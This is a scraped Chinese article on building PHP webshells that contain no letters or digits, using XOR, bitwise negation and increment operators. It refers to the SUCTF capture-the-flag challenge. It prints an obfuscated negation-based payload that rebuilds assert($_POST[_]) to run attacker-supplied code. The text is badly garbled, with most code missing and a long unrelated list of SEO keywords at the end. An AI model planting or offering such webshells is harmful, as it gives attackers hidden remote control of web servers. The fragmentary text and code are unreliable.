如何实现不包含数字字母的WebShell
发表于:2025-02-24 作者:千家信息网编辑
千家信息网最后更新 2025年02月24日,小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!一、使用异或 ^ 运算
千家信息网最后更新 2025年02月24日如何实现不包含数字字母的WebShell一、使用异或
小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!
一、使用异或 ^
运算
这个马是不能直接用的,因为代码中的url编码其实对应的是一个不可打印的特殊字符,这里只是为了显示程序方便,作者用url编码来取代,实际上木马应该是下面这个样子:
或者你还可以按照如下两种形式修改木马,使得木马可以运行。
二、使用取反
~
运算'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[_]);// assert($_POST[_]);前两天的SUCTF就考察了这个,但是需要对代码稍作修改。原题目可以写入特殊字符只有:
~ $ _ ; = ( )
,修改如下:(PS:代码由Wfox
师傅fuzz出来,也是参考P牛的文章 )fuzz脚本如下:
'; }?>赛后官方也提供了WP,PHP中使用按位取反(~)函数创建后门 。按照这篇文章,没有成功生成可用的shell,于是我又参考了另外一篇文章 Deformity PHP Webshell、Webshell Hidden Learning ,生成脚本如下:
# generate.php 运行该程序,生成木马shell.php, assert('eval($_POST[_])');')?>三、使用自增运算
++
看完了这篇文章,相信你对"如何实现不包含数字字母的WebShell"有了一定的了解,如果想了解更多相关知识,欢迎关注行业资讯频道,感谢各位的阅读!
木马
篇文章
生成
代码
字符
运算
字母
数字
特殊
程序
编码
脚本
参考
运行
成功
作者
函数
只是
只有
后门
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
服务器协议常用端口3389
红月服务端数据库表
阿尔比恩ol下午六点服务器更新
网络安全中等学校
永达网络技术有限公司招聘
学习软件开发都需要学习什么知识
做网络技术的职位
app软件开发主要学习什么
性直播有什么软件开发
iqrm软件开发
我的世界服务器如何锁定队友位置
青铜峡进销存管理软件开发
简画图软件开发
泰拉瑞亚服务器推荐
连不上服务器网段
互联网科技感色彩设计
西城区省电软件开发操作
网络时间服务器搭建linux
数据库应用技查询实训总结
爬虫能爬那些数据库
空间数据库维护的基本内容
对数据库输出
奇安信成为世界第一网络安全
阿里云独享型服务器
阴阳师会有几个服务器
江苏服务器硬盘质保期
石家庄鹿泉软件开发公司
互联网科技传媒影视
非法网络安全审查
泰拉瑞亚服务器推荐